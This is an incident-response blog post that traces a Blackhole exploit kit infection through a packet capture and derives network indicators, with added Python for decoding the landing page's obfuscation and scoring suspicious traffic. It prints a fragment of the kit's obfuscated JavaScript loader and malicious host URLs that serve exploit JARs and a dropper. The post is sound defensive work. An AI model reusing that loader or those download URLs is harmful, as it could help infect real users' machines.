By Grant Warkins Advisory Practice Consultant RSA/NetWitness Incident Response

Based on the last few Incident Response engagements I’ve participated in, the most common question I’ve heard is “what are the common indicators you are using to find evil?” This is not a question that has a simple answer.  In this blog post, I’ll examine a Blackhole exploit kit session and discuss the various network indicators that analysts should be looking for when identifying host exploitation and associated binaries.   The intent here is not to pick apart malware or de-obfuscate JavaScript, but to show how asking simple questions about your network traffic can reveal the bad stuff being missed by your other security products.

For this exercise, I’m utilizing a packet capture (PCAP) associated with a zero day exploit used by the Blackhole exploit kit 2.0.  This PCAP can be found on the Contagio malware repository managed by Mila Parkour[1].

This scenario begins with a phishing email attempting to spoof correspondence with a popular data processing outsourcing provider.  A user that clicks on the link with Firefox as the default browser will initiate the following HTTP GET request:


Figure 1: Initial HTTP GET Request

The response is a common indicator of a Blackhole exploit kit landing page, as noted by the text “WAIT PLEASE Loading…”, followed by JavaScript pointing to links associated with active redirectors.

Figure 2: Example of Blackhole Exploit Kit Landing Page


NOTE: Be careful when building IDS rules based on the HTML text above due to the high possibility of false positives. However, note that the folder names in the URL path contain 8 random alphanumeric characters.

Figure 3: Sample GET Request From Landing Page


Both URLs point to the same redirector containing the exploits to be served to the host:

Figure 4: Redirector Points to Host Containing Exploits


NOTE:  The ETag associated with this file was also found in PCAPs associated with other redirectors and could provide a useful indicator to be used in an IDS signature.

As shown in the GET request below, a common red flag for analysts to review is an HTTP GET request directly to an IP address.  While there are occasions where this is normal, it’s a good practice to verify that a direct HTTP request to an IP is benign.

Figure 5: Get Request Sent to Server Containing Exploit Code


Accessing this page dynamically generates heavily obfuscated JavaScript containing a URL pointing to PDF and Java exploits (Decoding this JavaScript will be discussed in a future blog post).

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:41:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.14-1~dotdeb.0
Content-Length: 27513

<html><body><applet archive="http://69.194.193.34/data/java.jar" code="fbeatbea.fbeatbed"><param value="N0b0909041f3131343e3c373e2b3c373e083c
***(removed code)***
^44303l3p3h*3r45441c3h&3q3g3b423h_3g3l423h3f@441g201k1k%1k1d23"></u><script>
a=document[g]("google")[gg]("data");
a=a.replace(/[^0-9a-z]/g,"");
s="";
for(i=0;i<a.length;i+=2){
if(020==0x10)s+=String.fromCharCode(parseInt(a.substr(i,2),28));}
try{(alert+"")()}catch(adgsdg){eval(s);}
</script></body></html>

Figure 6: Sample of Obfuscated JavaScript and Associated Jar File
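To show what the loop at the bottom of Figure 6 actually does, here is an added Python re-implementation (my code, not from the exploit kit or the original post): it mirrors the replace / parseInt(...,28) / fromCharCode steps, including JavaScript's lenient parseInt, and notes that the 020==0x10 guard is always true because 020 is octal 16. It also includes a constructed encoder so the decoder can be exercised on a harmless sample payload instead of the redacted one above.

```python
import re

# Digits JavaScript's parseInt accepts in base 28: 0-9, then a-r (case-insensitive).
DIGITS = "0123456789abcdefghijklmnopqr"

def js_parse_int(text, base=28):
    """Mimic parseInt(text, base): consume leading valid digits; None stands in for NaN."""
    value, seen = 0, False
    for ch in text.lower():
        d = DIGITS.find(ch)
        if d < 0 or d >= base:
            break
        value, seen = value * base + d, True
    return value if seen else None

def decode_blackhole_data(data):
    """Replicate the landing page's loop: drop everything outside [0-9a-z], then turn each
    pair of characters into one character via base-28 parseInt and String.fromCharCode."""
    cleaned = re.sub(r"[^0-9a-z]", "", data)          # a.replace(/[^0-9a-z]/g,"")
    out = []
    for i in range(0, len(cleaned), 2):               # the 020==0x10 guard is always true (020 is octal 16)
        n = js_parse_int(cleaned[i:i + 2])
        out.append(chr(n) if n is not None else "\x00")  # fromCharCode(NaN) gives U+0000
    return "".join(out)

def encode_blackhole_data(script, junk_every=6):
    """Constructed inverse, only for building test input: two base-28 digits per character,
    with uppercase/punctuation junk mixed in that the decoder's filter removes."""
    pairs = []
    for i, ch in enumerate(script):
        n = ord(ch)
        if n >= 28 * 28:
            raise ValueError("%r does not fit in two base-28 digits" % ch)
        pairs.append(DIGITS[n // 28] + DIGITS[n % 28])
        if i % junk_every == junk_every - 1:
            pairs.append("*N_")                       # stripped by the [^0-9a-z] filter
    return "".join(pairs)

# Harmless constructed payload standing in for the redacted one in Figure 6.
SAMPLE = encode_blackhole_data("document.write('<iframe src=\"http://example.invalid/x\">');")

if __name__ == "__main__":
    print(decode_blackhole_data(SAMPLE))
```

Because the filter keeps s-z but base 28 stops at r, a pair like "3z" decodes the way parseInt would (to 3), which is why the decoder keeps JavaScript's leading-digit behaviour rather than using Python's stricter int().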

Two of the links generated point to an unsuccessful PDF exploit for CVE-2010-0188:

  • 69.194.193.34/links/systems-links_warns.php?ljpcwedu=0206360203&unnioab=41&phjf=35353306040934370b06&jct=0b0006000200030b07.
  • 69.194.193.34/systems-links_warns.php?nfezhok=0906343704&sbipbq=3dzz7ecg=35353306040934370b06&qara=0b0007000400040b07.  This appears to be a second attempt due to the first being unsuccessful.

The PDFs contain the shellcode shown in Figure 7, which embeds the URL for the downloader in clear text: http://69.194.193.34/links/systems-links_warns.php?uselrju=0206360203&rlvb=35353306040934370b06&csymv=03&yhvqtw=ktkv&wciojds=ckgawow


Figure 7: Exploit Code From Malicious PDF

The third link accessed is associated with a Java JAR file that contained exploit code for CVE-2012-1723 and CVE-2012-4681 (Additional review of the JAR file will also be covered in a separate blog).  The successful exploit causes the host to download the dropper “calc.exe” from 69.194.193.34/links/systems-links_warns.php?tf=0206360203&le=35353306040934370b06&i=02&jy=b&fg=h.

Figure 8: Get Request for Downloader

NOTE: Another red flag for network analysis is shown above: Java/1.7.0_06 referenced in the User-Agent field. Outside of Java updates, it is not normal to see this, and the associated sessions should be reviewed.

The response contains additional red flags that should also be considered:

Figure 9: Response to HTTP GET Request for the Downloader
  • Content-Type does not match what was in the Accept field in the GET request.
  • Content-Disposition with filename.  This forces the save-as feature to download the file with that name and often indicates an automated download.

With the downloader now on the host and executed, we see it check-in:

Figure 10: Encrypted HTTP POST From Downloader

NOTE:  The above HTTP POST contains several red flags:

  • The User-Agent string contains Windows 98.
  • HTTP POST direct to an IP.
  • HTTP POST without an associated referrer field.
  • HTTP POST header contains HTTP/1.0.  This is not normally seen associated with modern browsers or tools.
Figure 11: Downloader C2 Response

With the check-in complete, it pulls down the Zeus Trojan:

Figure 12: HTTP GET Request for Zeus
Figure 13: Response to HTTP GET Request for Zeus

Finally, we see random UDP data being sent to seemingly random IP addresses, which is a good indicator that the Zeus version downloaded was P2P capable, without having to statically analyze it.

ip.dst = 79.14.79.134
ip.proto = 17
udp.srcport = 18707
udp.dstport = 24815
service = 0
streams = 1
packets = 1
lifetime = 0
country.dst = Italy
city.dst = Verona
latdec.dst = 45.45
longdec.dst = 11
org.dst = Telecom Italia
domain.dst = telecomitalia.it

Figure 14: Sample Zeus P2P Packet Metadata
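An added example, not from the post, of turning the observation above into a check over flow metadata: group UDP flows by source host and flag hosts that send single-packet datagrams between ephemeral ports to many distinct peers across several countries, which is what the P2P Zeus traffic looks like from the network. The records are constructed in the shape of Figure 14; ip.src is an assumed extra key, and the peer addresses and countries are made up.

```python
from collections import defaultdict
from statistics import median

def flow(src, dst, sport, dport, country, packets=1):
    # One flow record in the shape of Figure 14's metadata; ip.src is an assumed extra key.
    return {"ip.src": src, "ip.dst": dst, "ip.proto": 17, "udp.srcport": sport,
            "udp.dstport": dport, "packets": packets, "country.dst": country}

# UDP services that legitimately fan out to many hosts; flows on these ports are ignored.
KNOWN_UDP_PORTS = {53, 67, 68, 123, 137, 138, 443, 500, 1900, 4500, 5353}

def p2p_suspects(flows, min_peers=6, min_countries=3, max_median_packets=2):
    """Flag source hosts that spray short UDP flows between ephemeral ports at many
    distinct peers spread over several countries, the pattern Figure 14 shows for Zeus P2P."""
    by_src = defaultdict(list)
    for f in flows:
        if f["ip.proto"] != 17:
            continue
        if f["udp.srcport"] in KNOWN_UDP_PORTS or f["udp.dstport"] in KNOWN_UDP_PORTS:
            continue
        if f["udp.srcport"] < 1024 or f["udp.dstport"] < 1024:
            continue                                  # only ephemeral-to-ephemeral traffic
        by_src[f["ip.src"]].append(f)
    suspects = {}
    for src, fl in by_src.items():
        peers = {f["ip.dst"] for f in fl}
        countries = {f["country.dst"] for f in fl}
        if (len(peers) >= min_peers and len(countries) >= min_countries
                and median(f["packets"] for f in fl) <= max_median_packets):
            suspects[src] = {"peers": len(peers), "countries": sorted(countries)}
    return suspects

# Constructed flows: one host behaving like a Zeus P2P node, one doing DNS, one with a single busy peer.
PEERS = [("203.0.113.10", "Italy"), ("198.51.100.7", "Germany"), ("192.0.2.44", "United States"),
         ("203.0.113.77", "Brazil"), ("198.51.100.200", "Russia"), ("192.0.2.9", "India"),
         ("203.0.113.3", "Japan")]
FLOWS = [flow("10.0.0.5", dst, 18707 + i, 24815 + 7 * i, c) for i, (dst, c) in enumerate(PEERS)]
FLOWS += [flow("10.0.0.9", "10.0.0.1", 51000 + i, 53, "Private", 2) for i in range(20)]
FLOWS += [flow("10.0.0.7", "198.51.100.50", 27015, 27015, "Germany", 500)]

if __name__ == "__main__":
    print(p2p_suspects(FLOWS))
```

The thresholds are starting points to tune against your own baseline; VoIP, gaming and other real peer-to-peer applications will look similar and need their own exclusions.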

Figure 15: Sample P2P Data Sent By Zeus

So, just from quickly analyzing the Blackhole exploit kit in action, we’ve identified several key network indicators that analysts should keep an eye out for.  These indicators can be easily automated by your tool of choice, be it an IDS or a NetWitness Decoder, and can be grouped to reduce the number of false positive hits.  Additionally, products such as NetWitness are migrating to a unified analytics approach that automates the implementation of well-known indicators as they become known within the malware intelligence community.  The table below summarizes the network indicators we’ve identified:
Network Indicator | False Positive Rate
----------------- | -------------------
HTTP GET requests with folder names containing 8 random alphanumeric characters | High False Positive Rate
HTTP response containing "<h1>WAIT PLEASE</h1> <h3>Loading...</h3>" | High False Positive Rate
Signature based on a specific HTTP ETag | Low False Positive Rate
HTTP GET or POST direct to an IP | Moderate False Positive Rate
client contains java && (filetype = 'windows executable') | Low False Positive Rate
HTTP Content-Disposition with filename | Moderate False Positive Rate
User-Agent containing deprecated operating systems or browsers | Low False Positive Rate
HTTP POST or GET without a referrer field | Low False Positive Rate
HTTP POST referencing HTTP/1.0 | Moderate False Positive Rate

Figure 16: Summary of Common Network Indicators
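Added example (not from the post or from NetWitness): a Python triage function that checks one HTTP request/response record against the indicators in Figure 16 and the red flags called out for Figures 8 to 10, weighting each hit by the false-positive rate given above so that grouped low-FP hits stand out over the noise. The transactions it runs over are constructed to resemble the dropper GET and the check-in POST; the header values, the /post.php path and the MZ body are mine, not from the capture.

```python
import re
from ipaddress import ip_address
# Weight each hit by the false-positive rate Figure 16 assigns it (weights are my choice).
WEIGHT = {"High": 1, "Moderate": 2, "Low": 3}
RANDOM_DIR = re.compile(r"/[0-9a-z]{8}/")
OLD_UA = re.compile(r"Windows (95|98|ME|NT 4)|MSIE [1-6]\.")

def is_ip(host):
    try:
        ip_address(host.split(":")[0])                # ValueError for a hostname
        return True
    except ValueError:
        return False

def match_indicators(tx):
    """Return [(indicator, fp_rate)] matched by one request/response record."""
    req, resp = tx["request"], tx.get("response", {})
    h = {k.lower(): v for k, v in req["headers"].items()}
    rh = {k.lower(): v for k, v in resp.get("headers", {}).items()}
    ua = h.get("user-agent", "")
    hits = []
    if RANDOM_DIR.search(req["path"]):
        hits.append(("folder name of 8 random alphanumeric characters", "High"))
    if is_ip(h.get("host", "")):
        hits.append((req["method"] + " direct to an IP", "Moderate"))
    if "java" in ua.lower() and resp.get("body", b"").startswith(b"MZ"):  # MZ = Windows executable
        hits.append(("Java client received a Windows executable", "Low"))
    if "filename=" in rh.get("content-disposition", ""):
        hits.append(("Content-Disposition with filename", "Moderate"))
    if OLD_UA.search(ua):
        hits.append(("deprecated OS or browser in User-Agent", "Low"))
    if "referer" not in h:
        hits.append((req["method"] + " without a referrer field", "Low"))
    if req["method"] == "POST" and req["version"] == "HTTP/1.0":
        hits.append(("POST using HTTP/1.0", "Moderate"))
    return hits

def score(tx):
    return sum(WEIGHT[fp] for _, fp in match_indicators(tx))

# Constructed records modelled on Figures 8-10; none is copied from the capture.
DROPPER_GET = {"request": {"method": "GET", "version": "HTTP/1.1",
    "path": "/links/systems-links_warns.php?tf=0206360203&le=35353306040934370b06&i=02&jy=b&fg=h",
    "headers": {"Host": "69.194.193.34", "User-Agent": "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_06"}},
    "response": {"headers": {"Content-Type": "application/octet-stream",
                             "Content-Disposition": "attachment; filename=calc.exe"}, "body": b"MZ\x90\x00"}}
CHECKIN_POST = {"request": {"method": "POST", "version": "HTTP/1.0", "path": "/post.php",
    "headers": {"Host": "69.194.193.34", "User-Agent": "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"}}}
BENIGN_GET = {"request": {"method": "GET", "version": "HTTP/1.1", "path": "/index.html",
    "headers": {"Host": "www.example.com", "Referer": "https://www.example.com/",
                "User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0"}}}
```

Alerting on score(tx) above a threshold rather than on any single hit is the grouping the paragraph above describes; a lone direct-to-IP GET scores 2, while the dropper download and the check-in each score 10.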


[1] http://contagiodump.blogspot.com/2012/09/cve-2012-4681-samples-original-apt-and.html
